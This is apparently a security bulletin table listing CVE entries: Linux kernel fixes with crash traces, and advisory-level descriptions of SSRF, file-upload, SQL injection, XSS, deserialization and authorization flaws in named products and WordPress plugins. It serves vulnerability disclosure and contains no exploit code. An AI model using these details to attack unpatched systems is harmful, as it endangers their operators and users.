| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ovl: fix null pointer dereference in ovl_get_acl_rcu() The following interleaving of two processes triggers the bug. P1: path_openat -> link_path_walk -> may_lookup -> inode_permission(rcu) -> ovl_permission -> acl_permission_check -> check_acl -> get_cached_acl_rcu -> ovl_get_inode_acl -> realinode = ovl_inode_real(ovl_inode). Meanwhile P2: drop_cache -> __dentry_kill(ovl_dentry) -> iput(ovl_inode) -> ovl_destroy_inode(ovl_inode) -> dput(oi->__upperdentry) -> dentry_kill(upperdentry) -> dentry_unlink_inode -> upperdentry->d_inode = NULL. P1 then continues: ovl_inode_upper -> upperdentry = ovl_i_dentry_upper(ovl_inode) -> d_inode(upperdentry) // returns NULL -> IS_POSIXACL(realinode) // NULL pointer dereference. This triggers a null pointer dereference at realinode: [ 205.472797] BUG: kernel NULL pointer dereference, address: 0000000000000028 [ 205.476701] CPU: 2 PID: 2713 Comm: ls Not tainted 6.3.0-12064-g2edfa098e750-dirty #1216 [ 205.478754] RIP: 0010:do_ovl_get_acl+0x5d/0x300 [ 205.489584] Call Trace: [ 205.489812] <TASK> [ 205.490014] ovl_get_inode_acl+0x26/0x30 [ 205.490466] get_cached_acl_rcu+0x61/0xa0 [ 205.490908] generic_permission+0x1bf/0x4e0 [ 205.491447] ovl_permission+0x79/0x1b0 [ 205.491917] inode_permission+0x15e/0x2c0 [ 205.492425] link_path_walk+0x115/0x550 [ 205.493311] path_lookupat.isra.0+0xb2/0x200 [ 205.493803] filename_lookup+0xda/0x240 [ 205.495747] vfs_fstatat+0x7b/0xb0 Fetch a reproducer in [Link]. Use the helper ovl_i_path_realinode() to get realinode and then do non-nullptr checking. | 2025-12-30 | not yet calculated | CVE-2023-54313 | https://git.kernel.org/stable/c/d97481c7b2739a704848bb3c01f224dc71bdf78e https://git.kernel.org/stable/c/c4a5fb1ae5d3f02d3227afde2b9339994389463d https://git.kernel.org/stable/c/d536af163c53ce9f9bcfe87d2e9946f06f1a7ea4 https://git.kernel.org/stable/c/f4e19e595cc2e76a8a58413eb19d3d9c51328b53 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: af9005: Fix null-ptr-deref in af9005_i2c_xfer In af9005_i2c_xfer, msg is controlled by the user. When msg[i].buf is null and msg[i].len is zero, the former checks on msg[i].buf would be passed. Malicious data finally reaches af9005_i2c_xfer. If msg[i].buf[0] is accessed without a sanity check, a null ptr deref would happen. We add a check on msg[i].len to prevent the crash. Similar commit: commit 0ed554fd769a ("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()") | 2025-12-30 | not yet calculated | CVE-2023-54314 | https://git.kernel.org/stable/c/98c12abb275b75a98ff62de9466d21e4daa98536 https://git.kernel.org/stable/c/63d962ac7a52c0ff4cd09af2e284dce5e5955dfe https://git.kernel.org/stable/c/0c02eb70b1dd4ae9bb304ce6cdadbc6faba2b2e9 https://git.kernel.org/stable/c/c7e5ac737db25d7387fe517cb5207706782b6cf8 https://git.kernel.org/stable/c/033b0c0780adee32dde218179e9bc51d2525108f https://git.kernel.org/stable/c/abb6fd93e05e80668d2317fe1110bc99b05034c3 https://git.kernel.org/stable/c/e595ff350b2fd600823ee8491df7df693ae4b7c5 https://git.kernel.org/stable/c/f4ee84f27625ce1fdf41e8483fa0561a1b837d10 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/powernv/sriov: perform null check on iov before dereferencing iov Currently pointer iov is being dereferenced before the null check of iov which can lead to null pointer dereference errors. Fix this by moving the iov null check before the dereferencing. Detected using cppcheck static analysis: linux/arch/powerpc/platforms/powernv/pci-sriov.c:597:12: warning: Either the condition '!iov' is redundant or there is possible null pointer dereference: iov. [nullPointerRedundantCheck] num_vfs = iov->num_vfs; ^ | 2025-12-30 | not yet calculated | CVE-2023-54315 | https://git.kernel.org/stable/c/07c19c0ad4b07f4b598da369714de028f6a6a323 https://git.kernel.org/stable/c/d3a0d96c16e5f8d55e2c70163abda3c7c8328106 https://git.kernel.org/stable/c/d9a1aaea856002cb58dfb7c8d8770400fa1a0299 https://git.kernel.org/stable/c/6314465b88072a6b6f3b3c12a7898abe09095f95 https://git.kernel.org/stable/c/72990144e17e5e2cb378f1d9b10530b85b9bc382 https://git.kernel.org/stable/c/f4f913c980bc6abe0ccfe88fe3909c125afe4a2d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: refscale: Fix uninitalized use of wait_queue_head_t Running the refscale test occasionally crashes the kernel with the following error: [ 8569.952896] BUG: unable to handle page fault for address: ffffffffffffffe8 [ 8569.952900] #PF: supervisor read access in kernel mode [ 8569.952902] #PF: error_code(0x0000) - not-present page [ 8569.952904] PGD c4b048067 P4D c4b049067 PUD c4b04b067 PMD 0 [ 8569.952910] Oops: 0000 [#1] PREEMPT_RT SMP NOPTI [ 8569.952916] Hardware name: Dell Inc. PowerEdge R750/0WMWCR, BIOS 1.2.4 05/28/2021 [ 8569.952917] RIP: 0010:prepare_to_wait_event+0x101/0x190 : [ 8569.952940] Call Trace: [ 8569.952941] <TASK> [ 8569.952944] ref_scale_reader+0x380/0x4a0 [refscale] [ 8569.952959] kthread+0x10e/0x130 [ 8569.952966] ret_from_fork+0x1f/0x30 [ 8569.952973] </TASK> The likely cause is that init_waitqueue_head() is called after the call to the torture_create_kthread() function that creates the ref_scale_reader kthread. Although this init_waitqueue_head() call will very likely complete before this kthread is created and starts running, it is possible that the calling kthread will be delayed between the calls to torture_create_kthread() and init_waitqueue_head(). In this case, the new kthread will use the waitqueue head before it is properly initialized, which is not good for the kernel's health and well-being. The above crash happened here: static inline void __add_wait_queue(...) { : if (!(wq->flags & WQ_FLAG_PRIORITY)) <=== Crash here The offset of flags from list_head entry in wait_queue_entry is -0x18. If reader_tasks[i].wq.head.next is NULL as allocated reader_task structure is zero initialized, the instruction will try to access address 0xffffffffffffffe8, which is exactly the fault address listed above. This commit therefore invokes init_waitqueue_head() before creating the kthread. | 2025-12-30 | not yet calculated | CVE-2023-54316 | https://git.kernel.org/stable/c/066fbd8bc981cf49923bf828b7b4092894df577f https://git.kernel.org/stable/c/ec9d118ad99dc6f1bc674c1e649c25533d89b9ba https://git.kernel.org/stable/c/e0322a255a2242dbe4686b6176b3c83dea490529 https://git.kernel.org/stable/c/e5de968a9032366198720eac4f368ed7e690b3ef https://git.kernel.org/stable/c/70a2856fd1d0a040c876ba9e3f89b949ae92e4dd https://git.kernel.org/stable/c/f5063e8948dad7f31adb007284a5d5038ae31bb8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm flakey: don't corrupt the zero page When we need to zero some range on a block device, the function __blkdev_issue_zero_pages submits a write bio with the bio vector pointing to the zero page. If we use dm-flakey with corrupt bio writes option, it will corrupt the content of the zero page which results in crashes of various userspace programs. Glibc assumes that memory returned by mmap is zeroed and it uses it for calloc implementation; if the newly mapped memory is not zeroed, calloc will return non-zeroed memory. Fix this bug by testing if the page is equal to ZERO_PAGE(0) and avoiding the corruption in this case. | 2025-12-30 | not yet calculated | CVE-2023-54317 | https://git.kernel.org/stable/c/b7f8892f672222dbfcc721f51edc03963212b249 https://git.kernel.org/stable/c/98e311be44dbe31ad9c42aa067b2359bac451fda https://git.kernel.org/stable/c/3c4a56ef7c538d16c1738ba0ccea9e7146105b5a https://git.kernel.org/stable/c/f2b478228bfdd11e358c5bc197561331f5d5c394 https://git.kernel.org/stable/c/ff60b2bb680ebcaf8890814dd51084a022891469 https://git.kernel.org/stable/c/be360c83f2d810493c04f999d69ec9152981e0c0 https://git.kernel.org/stable/c/63d31617883d64b43b0e2d529f0751f40713ecae https://git.kernel.org/stable/c/f50714b57aecb6b3dc81d578e295f86d9c73f078 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/smc: use smc_lgr_list.lock to protect smc_lgr_list.list iterate in smcr_port_add While doing smcr_port_add, there maybe linkgroup add into or delete from smc_lgr_list.list at the same time, which may result kernel crash. So, use smc_lgr_list.lock to protect smc_lgr_list.list iterate in smcr_port_add. The crash calltrace show below: BUG: kernel NULL pointer dereference, address: 0000000000000000 PGD 0 P4D 0 Oops: 0000 [#1] SMP NOPTI CPU: 0 PID: 559726 Comm: kworker/0:92 Kdump: loaded Tainted: G Hardware name: Alibaba Cloud Alibaba Cloud ECS, BIOS 449e491 04/01/2014 Workqueue: events smc_ib_port_event_work [smc] RIP: 0010:smcr_port_add+0xa6/0xf0 [smc] RSP: 0000:ffffa5a2c8f67de0 EFLAGS: 00010297 RAX: 0000000000000001 RBX: ffff9935e0650000 RCX: 0000000000000000 RDX: 0000000000000010 RSI: ffff9935e0654290 RDI: ffff9935c8560000 RBP: 0000000000000000 R08: 0000000000000000 R09: ffff9934c0401918 R10: 0000000000000000 R11: ffffffffb4a5c278 R12: ffff99364029aae4 R13: ffff99364029aa00 R14: 00000000ffffffed R15: ffff99364029ab08 FS: 0000000000000000(0000) GS:ffff994380600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 0000000f06a10003 CR4: 0000000002770ef0 PKRU: 55555554 Call Trace: smc_ib_port_event_work+0x18f/0x380 [smc] process_one_work+0x19b/0x340 worker_thread+0x30/0x370 ? process_one_work+0x340/0x340 kthread+0x114/0x130 ? __kthread_cancel_work+0x50/0x50 ret_from_fork+0x1f/0x30 | 2025-12-30 | not yet calculated | CVE-2023-54318 | https://git.kernel.org/stable/c/d1c6c93c27a4bf48006ab16cd9b38d85559d7645 https://git.kernel.org/stable/c/06b4934ab2b534bb92935c7601852066ebb9eab8 https://git.kernel.org/stable/c/70c8d17007dc4a07156b7da44509527990e569b3 https://git.kernel.org/stable/c/b717463610a27fc0b58484cfead7a623d5913e61 https://git.kernel.org/stable/c/f5146e3ef0a9eea405874b36178c19a4863b8989 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: at91-pio4: check return value of devm_kasprintf() devm_kasprintf() returns a pointer to dynamically allocated memory. Pointer could be NULL in case allocation fails. Check pointer validity. Identified with coccinelle (kmerr.cocci script). Depends-on: 1c4e5c470a56 ("pinctrl: at91: use devm_kasprintf() to avoid potential leaks") Depends-on: 5a8f9cf269e8 ("pinctrl: at91-pio4: use proper format specifier for unsigned int") | 2025-12-30 | not yet calculated | CVE-2023-54319 | https://git.kernel.org/stable/c/8d788f2ba830d6d32499b198c526d577c590eedf https://git.kernel.org/stable/c/3e8ce1d5a1a9d758b359e5c426543957f35991f8 https://git.kernel.org/stable/c/aa3932eb07392d626486428e2ffddc660658e22a https://git.kernel.org/stable/c/f3c7b95c9991dab02e616fc251b6c3516e0bd0ac https://git.kernel.org/stable/c/0a95dd17a73b7603818ad7c46c99d757232be331 https://git.kernel.org/stable/c/0af388fce352ed2ab383fd5d1a08db551ca15c38 https://git.kernel.org/stable/c/5bfd577cc728270d6cd7af6c652a1e7661f25487 https://git.kernel.org/stable/c/8a1fa202f47f39680a4305af744f499a324f8a03 https://git.kernel.org/stable/c/f6fd5d4ff8ca0b24cee1af4130bcb1fa96b61aa0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86/amd: pmc: Fix memory leak in amd_pmc_stb_debugfs_open_v2() Function amd_pmc_stb_debugfs_open_v2() may be called when the STB debug mechanism enabled. When amd_pmc_send_cmd() fails, the 'buf' needs to be released. | 2025-12-30 | not yet calculated | CVE-2023-54320 | https://git.kernel.org/stable/c/d804adef7b23b22bb82e1b3dd113e9073cea9bc1 https://git.kernel.org/stable/c/f6e7ac4c35a28aef0be93b32c533ae678ad0b9e7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: driver core: fix potential null-ptr-deref in device_add() I got the following null-ptr-deref report while doing fault injection test: BUG: kernel NULL pointer dereference, address: 0000000000000058 CPU: 2 PID: 278 Comm: 37-i2c-ds2482 Tainted: G B W N 6.1.0-rc3+ RIP: 0010:klist_put+0x2d/0xd0 Call Trace: <TASK> klist_remove+0xf1/0x1c0 device_release_driver_internal+0x196/0x210 bus_remove_device+0x1bd/0x240 device_add+0xd3d/0x1100 w1_add_master_device+0x476/0x490 [wire] ds2482_probe+0x303/0x3e0 [ds2482] This is how it happened: w1_alloc_dev() // The dev->driver is set to w1_master_driver. memcpy(&dev->dev, device, sizeof(struct device)); device_add() bus_add_device() dpm_sysfs_add() // It fails, calls bus_remove_device. // error path bus_remove_device() // The dev->driver is not null, but driver is not bound. __device_release_driver() klist_remove(&dev->p->knode_driver) <-- It causes null-ptr-deref. // normal path bus_probe_device() // It's not called yet. device_bind_driver() If dev->driver is set, in the error path after calling bus_add_device() in device_add(), bus_remove_device() is called, then the device will be detached from driver. But device_bind_driver() is not called yet, so it causes null-ptr-deref while access the 'knode_driver'. To fix this, set dev->driver to null in the error path before calling bus_remove_device(). | 2025-12-30 | not yet calculated | CVE-2023-54321 | https://git.kernel.org/stable/c/2c59650d078b1b3f1ea50d5f8ee9fcc537dc02d3 https://git.kernel.org/stable/c/7cf515bf9e8c2908dc170ecf2df117162a16c9c5 https://git.kernel.org/stable/c/17982304806c5c10924e73f7ca5556e0d7378452 https://git.kernel.org/stable/c/f6837f34a34973ef6600c08195ed300e24e97317 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64: set __exception_irq_entry with __irq_entry as a default filter_irq_stacks() is supposed to cut entries which are related irq entries from its call stack. And in_irqentry_text() which is called by filter_irq_stacks() uses __irqentry_text_start/end symbol to find irq entries in callstack. But it doesn't work correctly as without "CONFIG_FUNCTION_GRAPH_TRACER", arm64 kernel doesn't include gic_handle_irq which is entry point of arm64 irq between __irqentry_text_start and __irqentry_text_end as we discussed in below link. https://lore.kernel.org/all/CACT4Y+aReMGLYua2rCLHgFpS9io5cZC04Q8GLs-uNmrn1ezxYQ@mail.gmail.com/#t This problem can makes unintentional deep call stack entries especially in KASAN enabled situation as below. [ 2479.383395]I[0:launcher-loader: 1719] Stack depot reached limit capacity [ 2479.383538]I[0:launcher-loader: 1719] WARNING: CPU: 0 PID: 1719 at lib/stackdepot.c:129 __stack_depot_save+0x464/0x46c [ 2479.385693]I[0:launcher-loader: 1719] pstate: 624000c5 (nZCv daIF +PAN -UAO +TCO -DIT -SSBS BTYPE=--) [ 2479.385724]I[0:launcher-loader: 1719] pc : __stack_depot_save+0x464/0x46c [ 2479.385751]I[0:launcher-loader: 1719] lr : __stack_depot_save+0x460/0x46c [ 2479.385774]I[0:launcher-loader: 1719] sp : ffffffc0080073c0 [ 2479.385793]I[0:launcher-loader: 1719] x29: ffffffc0080073e0 x28: ffffffd00b78a000 x27: 0000000000000000 [ 2479.385839]I[0:launcher-loader: 1719] x26: 000000000004d1dd x25: ffffff891474f000 x24: 00000000ca64d1dd [ 2479.385882]I[0:launcher-loader: 1719] x23: 0000000000000200 x22: 0000000000000220 x21: 0000000000000040 [ 2479.385925]I[0:launcher-loader: 1719] x20: ffffffc008007440 x19: 0000000000000000 x18: 0000000000000000 [ 2479.385969]I[0:launcher-loader: 1719] x17: 2065726568207475 x16: 000000000000005e x15: 2d2d2d2d2d2d2d20 [ 2479.386013]I[0:launcher-loader: 1719] x14: 5d39313731203a72 x13: 00000000002f6b30 x12: 00000000002f6af8 [ 2479.386057]I[0:launcher-loader: 1719] x11: 00000000ffffffff x10: ffffffb90aacf000 x9 : e8a74a6c16008800 [ 2479.386101]I[0:launcher-loader: 1719] x8 : e8a74a6c16008800 x7 : 00000000002f6b30 x6 : 00000000002f6af8 [ 2479.386145]I[0:launcher-loader: 1719] x5 : ffffffc0080070c8 x4 : ffffffd00b192380 x3 : ffffffd0092b313c [ 2479.386189]I[0:launcher-loader: 1719] x2 : 0000000000000001 x1 : 0000000000000004 x0 : 0000000000000022 [ 2479.386231]I[0:launcher-loader: 1719] Call trace: [ 2479.386248]I[0:launcher-loader: 1719] __stack_depot_save+0x464/0x46c [ 2479.386273]I[0:launcher-loader: 1719] kasan_save_stack+0x58/0x70 [ 2479.386303]I[0:launcher-loader: 1719] save_stack_info+0x34/0x138 [ 2479.386331]I[0:launcher-loader: 1719] kasan_save_free_info+0x18/0x24 [ 2479.386358]I[0:launcher-loader: 1719] ____kasan_slab_free+0x16c/0x170 [ 2479.386385]I[0:launcher-loader: 1719] __kasan_slab_free+0x10/0x20 [ 2479.386410]I[0:launcher-loader: 1719] kmem_cache_free+0x238/0x53c [ 2479.386435]I[0:launcher-loader: 1719] mempool_free_slab+0x1c/0x28 [ 2479.386460]I[0:launcher-loader: 1719] mempool_free+0x7c/0x1a0 [ 2479.386484]I[0:launcher-loader: 1719] bvec_free+0x34/0x80 [ 2479.386514]I[0:launcher-loader: 1719] bio_free+0x60/0x98 [ 2479.386540]I[0:launcher-loader: 1719] bio_put+0x50/0x21c [ 2479.386567]I[0:launcher-loader: 1719] f2fs_write_end_io+0x4ac/0x4d0 [ 2479.386594]I[0:launcher-loader: 1719] bio_endio+0x2dc/0x300 [ 2479.386622]I[0:launcher-loader: 1719] __dm_io_complete+0x324/0x37c [ 2479.386650]I[0:launcher-loader: 1719] dm_io_dec_pending+0x60/0xa4 [ 2479.386676]I[0:launcher-loader: 1719] clone_endio+0xf8/0x2f0 [ 2479.386700]I[0:launcher-loader: 1719] bio_endio+0x2dc/0x300 [ 2479.386727]I[0:launcher-loader: 1719] blk_update_request+0x258/0x63c [ 2479.386754]I[0:launcher-loader: 1719] scsi_end_request+0x50/0x304 [ 2479.386782]I[0:launcher-loader: 1719] scsi_io_completion+0x88/0x160 [ 2479.386808]I[0:launcher-loader: 1719] scsi_finish_command+0x17c/0x194 [ 2479.386833]I ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54322 | https://git.kernel.org/stable/c/c71d6934c6ac40a97146a410e0320768c7b1bb3c https://git.kernel.org/stable/c/0bd309f22663f3ee749bea0b6d70642c31a1c0a5 https://git.kernel.org/stable/c/d3b219e504fc5c5a25fa7c04c8589ff34baef9a8 https://git.kernel.org/stable/c/f6794950f0e5ba37e3bbedda4d6ab0aad7395dd3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cxl/pmem: Fix nvdimm registration races A loop of the form: while true; do modprobe cxl_pci; modprobe -r cxl_pci; done ...fails with the following crash signature: BUG: kernel NULL pointer dereference, address: 0000000000000040 [..] RIP: 0010:cxl_internal_send_cmd+0x5/0xb0 [cxl_core] [..] Call Trace: <TASK> cxl_pmem_ctl+0x121/0x240 [cxl_pmem] nvdimm_get_config_data+0xd6/0x1a0 [libnvdimm] nd_label_data_init+0x135/0x7e0 [libnvdimm] nvdimm_probe+0xd6/0x1c0 [libnvdimm] nvdimm_bus_probe+0x7a/0x1e0 [libnvdimm] really_probe+0xde/0x380 __driver_probe_device+0x78/0x170 driver_probe_device+0x1f/0x90 __device_attach_driver+0x85/0x110 bus_for_each_drv+0x7d/0xc0 __device_attach+0xb4/0x1e0 bus_probe_device+0x9f/0xc0 device_add+0x445/0x9c0 nd_async_device_register+0xe/0x40 [libnvdimm] async_run_entry_fn+0x30/0x130 ...namely that the bottom half of async nvdimm device registration runs after the CXL has already torn down the context that cxl_pmem_ctl() needs. Unlike the ACPI NFIT case that benefits from launching multiple nvdimm device registrations in parallel from those listed in the table, CXL is already marked PROBE_PREFER_ASYNCHRONOUS. So provide for a synchronous registration path to preclude this scenario. | 2025-12-30 | not yet calculated | CVE-2023-54323 | https://git.kernel.org/stable/c/a371788d4f4a7f59eecd22644331d599979fd283 https://git.kernel.org/stable/c/18c65667fa9104780eeaa0dc1bc240f0c2094772 https://git.kernel.org/stable/c/f57aec443c24d2e8e1f3b5b4856aea12ddda4254 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm: fix a race condition in retrieve_deps There's a race condition in the multipath target when retrieve_deps races with multipath_message calling dm_get_device and dm_put_device. retrieve_deps walks the list of open devices without holding any lock but multipath may add or remove devices to the list while it is running. The end result may be memory corruption or use-after-free memory access. See this description of a UAF with multipath_message(): https://listman.redhat.com/archives/dm-devel/2022-October/052373.html Fix this bug by introducing a new rw semaphore "devices_lock". We grab devices_lock for read in retrieve_deps and we grab it for write in dm_get_device and dm_put_device. | 2025-12-30 | not yet calculated | CVE-2023-54324 | https://git.kernel.org/stable/c/dbf1a719850577bb51fc7512a3972994b797a17b https://git.kernel.org/stable/c/38f6e5ae5d9ff4a4050ea6f7b543d5d5a4e087cf https://git.kernel.org/stable/c/f6007dce0cd35d634d9be91ef3515a6385dcee16 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: qat - fix out-of-bounds read When preparing an AER-CTR request, the driver copies the key provided by the user into a data structure that is accessible by the firmware. If the target device is QAT GEN4, the key size is rounded up by 16 since a rounded up size is expected by the device. If the key size is rounded up before the copy, the size used for copying the key might be bigger than the size of the region containing the key, causing an out-of-bounds read. Fix by doing the copy first and then update the keylen. This is to fix the following warning reported by KASAN: [ 138.150574] BUG: KASAN: global-out-of-bounds in qat_alg_skcipher_init_com.isra.0+0x197/0x250 [intel_qat] [ 138.150641] Read of size 32 at addr ffffffff88c402c0 by task cryptomgr_test/2340 [ 138.150651] CPU: 15 PID: 2340 Comm: cryptomgr_test Not tainted 6.2.0-rc1+ #45 [ 138.150659] Hardware name: Intel Corporation ArcherCity/ArcherCity, BIOS EGSDCRB1.86B.0087.D13.2208261706 08/26/2022 [ 138.150663] Call Trace: [ 138.150668] <TASK> [ 138.150922] kasan_check_range+0x13a/0x1c0 [ 138.150931] memcpy+0x1f/0x60 [ 138.150940] qat_alg_skcipher_init_com.isra.0+0x197/0x250 [intel_qat] [ 138.151006] qat_alg_skcipher_init_sessions+0xc1/0x240 [intel_qat] [ 138.151073] crypto_skcipher_setkey+0x82/0x160 [ 138.151085] ? prepare_keybuf+0xa2/0xd0 [ 138.151095] test_skcipher_vec_cfg+0x2b8/0x800 | 2025-12-30 | not yet calculated | CVE-2023-54325 | https://git.kernel.org/stable/c/7697139d5dfd491f4c495a914a1dd68f6e827a0f https://git.kernel.org/stable/c/dc3809f390357c8992f0a23083da934a20fef9af https://git.kernel.org/stable/c/2b1501f058245573a3aa6bf234d205dde1196184 https://git.kernel.org/stable/c/f6044cc3030e139f60c281386f28bda6e3049d66 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: pci_endpoint_test: Free IRQs before removing the device In pci_endpoint_test_remove(), freeing the IRQs after removing the device creates a small race window for IRQs to be received with the test device memory already released, causing the IRQ handler to access invalid memory, resulting in an oops. Free the device IRQs before removing the device to avoid this issue. | 2025-12-30 | not yet calculated | CVE-2023-54326 | https://git.kernel.org/stable/c/fb7f8bdb886f2ebf35ee5edaf2bf5f02b063ddb7 https://git.kernel.org/stable/c/dd2210379205fcd23a9d8869b0cef90e3770577c https://git.kernel.org/stable/c/cdf9a7e2cdc7a5464e3cc6d0b715ba2b1d215521 https://git.kernel.org/stable/c/14bdee38e96c7d37ca15e7bea50411eee25fe315 https://git.kernel.org/stable/c/c2dba13bc0c62b79a3cbe4bfe5faa32231bf9b55 https://git.kernel.org/stable/c/38d12bcf4e2ce3d285eb29644a79a54f42040fab https://git.kernel.org/stable/c/f61b7634a3249d12b9daa36ffbdb9965b6f24c6c |
| pmmp--PocketMine-MP | PocketMine-MP versions prior to 4.18.1 contain an improper input validation vulnerability in inventory transaction handling. A remote attacker with a valid player session can request that the server drop more items than are available in the player's hotbar, triggering a server crash and resulting in denial of service. | 2025-12-31 | not yet calculated | CVE-2023-7332 | https://github.com/pmmp/PocketMine-MP/blob/4.18.1/changelogs/4.18.md https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-h87r-f4vc-mchv https://github.com/pmmp/PocketMine-MP/commit/5897476 https://www.vulncheck.com/advisories/pocketmine-mp-improper-validation-of-dropped-item-count-allows-remote-server-crash |
| Vvvebjs--givanz | A critical vulnerability has been identified in givanz VvvebJs 1.7.2, which allows both Server-Side Request Forgery (SSRF) and arbitrary file reading. The vulnerability stems from improper handling of user-supplied URLs in the "file_get_contents" function within the "save.php" file. | 2025-12-29 | not yet calculated | CVE-2024-25181 | https://gist.github.com/joaoviictorti/69cbae23d98fb9a1a4b3eee0c305c7de |
| Vvvebjs--givanz | givanz VvvebJs 1.7.2 suffers from a File Upload vulnerability via save.php. | 2025-12-29 | not yet calculated | CVE-2024-25182 | https://gist.github.com/joaoviictorti/ff6220d8ed6df77a0420f4413a1d9b8d |
| Vvvebjs--givanz | givanz VvvebJs 1.7.2 is vulnerable to Directory Traversal via scan.php. | 2025-12-29 | not yet calculated | CVE-2024-25183 | https://gist.github.com/joaoviictorti/db387ef5ea3d35482c5ad4598d945b2f |
| Vvvebjs--givanz | givanz VvvebJs 1.7.2 is vulnerable to Insecure File Upload. | 2025-12-29 | not yet calculated | CVE-2024-27480 | https://gist.github.com/joaoviictorti/abb2d1929c29d09c13c60bb45f28a8ff |
| DedeCMS--Dede | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /src/dede/makehtml_list_action.php. | 2025-12-29 | not yet calculated | CVE-2024-30855 | https://github.com/Limingqian123/cms/blob/main/1.md https://gist.github.com/Limingqian123/e90a1b86c02bd83d4ab07c08cad9a629 |
| REDCap--REDCap | REDCap 14.3.13 allows an attacker to enumerate usernames due to an observable discrepancy between login attempts. | 2026-01-02 | not yet calculated | CVE-2024-55374 | http://redcap.com https://github.com/T3slaa/CVE-2024-55374 |
| feast-dev--feast-dev/feast | A high-severity remote code execution vulnerability exists in feast-dev/feast version 0.53.0, specifically in the Kubernetes materializer job located at `feast/sdk/python/feast/infra/compute_engines/kubernetes/main.py`. The vulnerability arises from the use of `yaml.load(..., Loader=yaml.Loader)` to deserialize `/var/feast/feature_store.yaml` and `/var/feast/materialization_config.yaml`. This method allows for the instantiation of arbitrary Python objects, enabling an attacker with the ability to modify these YAML files to execute OS commands on the worker pod. This vulnerability can be exploited before the configuration is validated, potentially leading to cluster takeover, data poisoning, and supply-chain sabotage. | 2026-01-01 | not yet calculated | CVE-2025-11157 | https://huntr.com/bounties/46d4d585-b968-4a76-80ce-872bc5525564 https://github.com/feast-dev/feast/commit/b2e37ff37953b68ae833f6874ab5bc510a4ca5fb |
| QNAP Systems Inc.--Malware Remover | An improper control of generation of code vulnerability has been reported to affect Malware Remover. Remote attackers can exploit the vulnerability to bypass a protection mechanism. We have already fixed the vulnerability in the following version: Malware Remover 6.6.8.20251023 and later. | 2026-01-02 | not yet calculated | CVE-2025-11837 | https://www.qnap.com/en/security-advisory/qsa-25-47 |
| Unknown--WPBookit | The WPBookit WordPress plugin through 1.0.7 lacks a CSRF check when deleting customers. This could allow an unauthenticated attacker to delete any customer through a CSRF attack. | 2026-01-02 | not yet calculated | CVE-2025-12685 | https://wpscan.com/vulnerability/e5ba488a-b43d-4c5f-9716-4b24701999f3/ |
| Unknown--Knowband Mobile App Builder | The Knowband Mobile App Builder WordPress plugin before 3.0.0 does not have authorisation when deleting users via its REST API, allowing unauthenticated attackers to delete arbitrary users. | 2025-12-31 | not yet calculated | CVE-2025-13029 | https://wpscan.com/vulnerability/22344534-cd36-4817-b683-c0af55759e01/ |
| Unknown--Logo Slider | The Logo Slider WordPress plugin before 4.9.0 does not validate and escape some of its slider options before outputting them back in the dashboard, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2026-01-02 | not yet calculated | CVE-2025-13153 | https://wpscan.com/vulnerability/0ed67947-228d-420c-8d28-e0d7326eb101/ |
| Unknown--Plugin Organizer | The Plugin Organizer WordPress plugin before 10.2.4 does not sanitize and escape a parameter before using it in a SQL statement, allowing subscribers to perform SQL injection attacks. | 2025-12-29 | not yet calculated | CVE-2025-13417 | https://wpscan.com/vulnerability/862fdf28-5195-443d-8ef2-e4043d0fdc92/ |
| Unknown--ShopBuilder | The ShopBuilder WordPress plugin before 3.2.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2026-01-02 | not yet calculated | CVE-2025-13456 | https://wpscan.com/vulnerability/5872ece6-52cb-4306-b7ee-41282815a243/ |
| Unknown--Comments | The Comments WordPress plugin before 7.6.40 does not properly validate user's identity when using the disqus.com provider, allowing an attacker to log in to any user (when knowing their email address) when such user does not have an account on disqus.com yet. | 2026-01-01 | not yet calculated | CVE-2025-13820 | https://wpscan.com/vulnerability/21bc9b41-a967-42dc-9916-bb993b05709c/ |
| Unknown--YaMaps for WordPress Plugin | The YaMaps for WordPress Plugin WordPress plugin before 0.6.40 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2025-12-29 | not yet calculated | CVE-2025-13958 | https://wpscan.com/vulnerability/0d4bb338-f0d0-4b57-8664-1b8cba7cbe52/ |
| Unknown--Ninja Forms | The Ninja Forms WordPress plugin before 3.13.3 allows unauthenticated attackers to generate valid access tokens via the REST API which can then be used to read form submissions. | 2026-01-02 | not yet calculated | CVE-2025-14072 | https://wpscan.com/vulnerability/4b19a333-eb19-4903-aa96-1fe871dd0f9f/ |
| TP-Link Systems Inc.--TL-WR820N v2.8 | A vulnerability in the SSH server of TP-Link TL-WR820N v2.80 allows the use of a weak cryptographic algorithm, enabling an adjacent attacker to intercept and decrypt SSH traffic. Exploitation may expose sensitive information and compromise confidentiality. | 2025-12-29 | not yet calculated | CVE-2025-14175 | https://www.tp-link.com/en/support/download/tl-wr820n/#Firmware https://www.tp-link.com/in/support/download/tl-wr820n/#Firmware https://www.tp-link.com/us/support/faq/4861/ |
